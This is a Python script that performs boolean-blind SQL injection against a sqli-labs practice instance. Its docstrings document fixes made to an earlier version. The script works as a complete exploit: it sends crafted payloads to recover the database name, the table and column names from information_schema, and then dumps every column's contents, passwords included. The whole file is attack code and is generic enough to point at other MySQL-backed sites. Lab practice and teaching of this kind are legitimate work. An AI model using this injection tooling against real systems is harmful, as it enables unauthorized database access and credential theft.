import http.client
import re
#网页的连接、GET请求、以及判断页面是否报错。
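def sql_inject(url, host='192.168.100.200:8004', timeout=None) -> bool:
    """Boolean-blind oracle: GET *url* on the lab host and report a "true" page.

    Sends the (already URL-encoded) request target to the sqli-labs instance
    and looks for the ``Your Login name:Dumb<br>Your Password:Dumb`` block in
    the body; that block is what the page shows when the injected predicate
    holds and row ``id=1`` is rendered. Only use against a target you are
    authorized to test — every extraction step issues hundreds of requests.

    Args:
        url: Request target (path + query string) carrying the payload.
        host: ``host:port`` of the target; defaults to the lab instance the
            script was written for.
        timeout: Socket timeout in seconds. ``None`` (the default, matching
            the original) blocks indefinitely; pass a value if the target can
            hang, otherwise one stalled probe stops the whole run.

    Returns:
        True when the page shows the ``Dumb`` login, False otherwise. (The
        original fell through to ``None`` when the marker was absent;
        callers only test truthiness, so returning False is compatible.)
    """
    con = http.client.HTTPConnection(host, timeout=timeout)
    try:
        con.request('GET', url)
        # errors='replace': one non-UTF-8 byte in the page must not abort a
        # long extraction run with UnicodeDecodeError.
        html = con.getresponse().read().decode(errors='replace')
    finally:
        # Release the socket; the original opened one connection per probe
        # and never closed it.
        con.close()
    li = re.findall(">Your Login name:(.*?)<br>Your Password:Dumb</font>", html)
    return bool(li) and li[0] == "Dumb"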
#获取数据长度(数据库长度、表长度、列名的长度,没有判断为空的情况)
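def get_length(url, sql, *, max_length=4096, probe=None) -> int:
    """Find the length of the value *sql* evaluates to on the target.

    Tries ``length((sql)) = n`` for n = 1, 2, 3, ... through the boolean
    oracle and returns the first n it confirms.

    Args:
        url: Base request path ending at the injectable parameter
            (e.g. ``/Less-1/?id=``).
        sql: SQL expression with spaces already encoded as ``%20``; it is
            spliced into the payload verbatim.
        max_length: Upper bound of the search. The original looped forever
            when nothing ever matched — e.g. a NULL expression, since
            ``length(NULL)`` is NULL and never equals n, or a target that
            stopped answering.
        probe: Oracle ``probe(url) -> bool``; defaults to ``sql_inject``.
            Exposed so the search logic can be exercised without a target.

    Returns:
        The matched length (>= 1).

    Raises:
        RuntimeError: no length in ``1..max_length`` satisfied the oracle.
    """
    if probe is None:
        probe = sql_inject
    for length in range(1, max_length + 1):
        url1 = url + f"1%27and%20length%20(({sql}))=%27{length}%27%20%20--+"
        if probe(url1):
            return length
    raise RuntimeError(f"no length in 1..{max_length} matched for {sql!r}")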
#获取数据库名字
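def get_dbname(url, charset="abcdefghijklmnopqrstuvwxyz0123456789_") -> str:
    """Recover the current database name one character at a time.

    Gets the name's length via ``get_length(url, "database()")``, then for
    each position asks the oracle ``substr(database(), i, 1) = 'c'`` for every
    candidate in *charset* and keeps the first match.

    Args:
        url: Base request path ending at the injectable parameter.
        charset: Candidates tried per position, in order. The default adds
            digits and ``_`` to the original a-z set, which silently skipped
            any other character and returned a shortened name. Candidates
            are placed unencoded inside single quotes in the payload, so do
            not put ``'`` or URL-special characters here. The comparison
            runs under the target's collation; with a case-insensitive
            default, lowercase candidates also match uppercase letters —
            TODO confirm for the target.

    Returns:
        The recovered name. A position no candidate matched is written as
        ``?`` rather than dropped, so the result keeps its true length.
    """
    length = get_length(url, "database()")
    chars = []
    for i in range(1, length + 1):
        for c in charset:
            url1 = url + f"1%27and%20substr(database(),{i},1)='{c}'%20%20%20--+"
            if sql_inject(url1):
                chars.append(c)
                break
        else:
            # No candidate matched: mark the gap instead of hiding it.
            chars.append("?")
    return "".join(chars)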
#获取表名
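def get_table_name(url, dbname, charset=",_abcdefghijklmnopqrstuvwxyz0123456789") -> str:
    """Recover the comma-joined list of table names in *dbname*.

    Builds ``SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.TABLES
    WHERE TABLE_SCHEMA='dbname'``, measures its length with ``get_length``,
    then recovers each character with ``substr((sql), i, 1) = 'c'`` probes.

    Args:
        url: Base request path ending at the injectable parameter.
        dbname: Schema name, spliced verbatim into the query; a ``'`` in a
            harvested name would break the payload.
        charset: Candidates tried per position. The default now matches
            ``get_column_name`` (``_`` included) and adds digits; the
            original omitted ``_``, so a table name containing it came back
            with that character missing. Keep ``,`` in the set — it is the
            GROUP_CONCAT separator the caller splits on.

    Returns:
        The recovered string (e.g. ``emails,referers,uagents,users``). A
        position no candidate matched is written as ``?``.
    """
    sql = f"SELECT%20GROUP_CONCAT(TABLE_NAME)%20FROM%20information_schema.TABLES%20WHERE%20TABLE_SCHEMA=%27{dbname}%27"
    length = get_length(url, sql)
    chars = []
    for i in range(1, length + 1):
        for c in charset:
            url1 = url + f"1%27+and+substr(({sql}),{i},1)=%27{c}%27--+"
            if sql_inject(url1):
                chars.append(c)
                break
        else:
            # No candidate matched: mark the gap instead of hiding it.
            chars.append("?")
    return "".join(chars)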
#获取列名
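def get_column_name(url, dbname, tablename, charset=",_abcdefghijklmnopqrstuvwxyz0123456789") -> str:
    """Recover the comma-joined list of column names of *tablename*.

    Builds ``SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS
    WHERE TABLE_SCHEMA='dbname' and TABLE_NAME='tablename'``, measures its
    length with ``get_length``, then recovers each character with
    ``substr((sql), i, 1) = 'c'`` probes.

    Args:
        url: Base request path ending at the injectable parameter.
        dbname: Schema name, spliced verbatim into the query.
        tablename: Table name, spliced verbatim; values come from
            ``get_table_name`` and a ``'`` in one would break the payload.
        charset: Candidates tried per position. Digits are new relative to
            the original ``,_a-z`` set, which silently dropped them. Keep
            ``,`` — it is the GROUP_CONCAT separator the caller splits on.

    Returns:
        The recovered string (e.g. ``id,username,password``). A position no
        candidate matched is written as ``?``.
    """
    sql = f"SELECT%20GROUP_CONCAT(COLUMN_NAME)%20FROM%20information_schema.COLUMNS%20WHERE%20TABLE_SCHEMA%20=%27{dbname}%27and%20TABLE_NAME=%27{tablename}%27"
    length = get_length(url, sql)
    chars = []
    for i in range(1, length + 1):
        for c in charset:
            url1 = url + f"1%27+and+substr(({sql}),{i},1)=%27{c}%27--+"
            if sql_inject(url1):
                chars.append(c)
                break
        else:
            # No candidate matched: mark the gap instead of hiding it.
            chars.append("?")
    return "".join(chars)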
#使用ascii码查找内容、形参dbname并没有用到
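def content_all(url, tablename, column, dbname) -> str:
    """Dump all values of *column* in *tablename* as one comma-joined string.

    Runs ``SELECT GROUP_CONCAT(column) FROM tablename`` through the oracle:
    ``get_length2`` gives the length (and detects a NULL result), then each
    position is recovered by comparing ``ascii(substr((sql), i, 1))`` with
    every 7-bit code.

    Args:
        url: Base request path ending at the injectable parameter.
        tablename: Table to read, spliced verbatim into the query.
        column: Column to read, spliced verbatim into the query.
        dbname: Accepted for call compatibility but unused — the query runs
            against the connection's current database.

    Returns:
        The recovered text, ``""`` when the result is NULL or empty. A
        position no code matched (e.g. a non-ASCII byte) is written as ``?``.
    """
    sql = f"SELECT%20GROUP_CONCAT({column})%20FROM%20{tablename}"
    length = get_length2(url, sql)
    # get_length2 may report an all-NULL/empty result with a non-int
    # sentinel; treat that like 0 instead of crashing on ``length + 1``.
    if not isinstance(length, int) or length <= 0:
        return ""
    chars = []
    for i in range(1, length + 1):
        # Full 7-bit ASCII. The original stopped at 120, so 'y' (121),
        # 'z' (122) and '{|}~' were never recovered and silently vanished
        # from usernames and passwords.
        for code in range(128):
            url1 = url + f"1%27+and+ascii(substr(({sql}),{i},1))=%27{code}%27--+"
            if sql_inject(url1):
                chars.append(chr(code))
                break
        else:
            chars.append("?")
    return "".join(chars)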
#查找内容长度,判断是否为空
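def get_length2(url, sql, *, max_length=4096, probe=None) -> int:
    """Like ``get_length`` but NULL-aware and starting the search at 0.

    First asks the oracle whether ``((sql)) IS NULL`` — once, up front; the
    original re-sent that probe on every loop iteration — then tries
    ``length((sql)) = n`` for n = 0, 1, 2, ...

    Args:
        url: Base request path ending at the injectable parameter.
        sql: SQL expression with spaces already encoded as ``%20``.
        max_length: Upper bound of the search; the original looped forever
            when nothing matched.
        probe: Oracle ``probe(url) -> bool``; defaults to ``sql_inject``.

    Returns:
        0 when the expression is NULL, otherwise the matched length (which
        is also 0 for an empty string). The original returned the string
        ``'列表内容为空'`` for NULL, which made ``content_all`` raise
        TypeError on ``range(1, length + 1)``.

    Raises:
        RuntimeError: no length in ``0..max_length`` satisfied the oracle.
    """
    if probe is None:
        probe = sql_inject
    url2 = url + f"1%27and%20(({sql}))%20IS%20NULL%20--+"
    if probe(url2):
        return 0
    for length in range(0, max_length + 1):
        url1 = url + f"1%27and%20length%20(({sql}))=%27{length}%27%20%20--+"
        if probe(url1):
            return length
    raise RuntimeError(f"no length in 0..{max_length} matched for {sql!r}")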
if __name__ == '__main__':
    # Walk the lab target top-down: database -> tables -> columns -> rows.
    # The host is fixed inside sql_inject; only the injectable path lives here.
    url = "/Less-1/?id="
    dbname = get_dbname(url)
    print('库名:', dbname)
    tables = get_table_name(url, dbname).split(',')
    print('表名:', tables)
    for table in tables:
        columns = get_column_name(url, dbname, table)
        print(f'表{table}中列名有', columns, sep=':')
        for column in columns.split(','):
            print(column)
            print(content_all(url, table, column, dbname))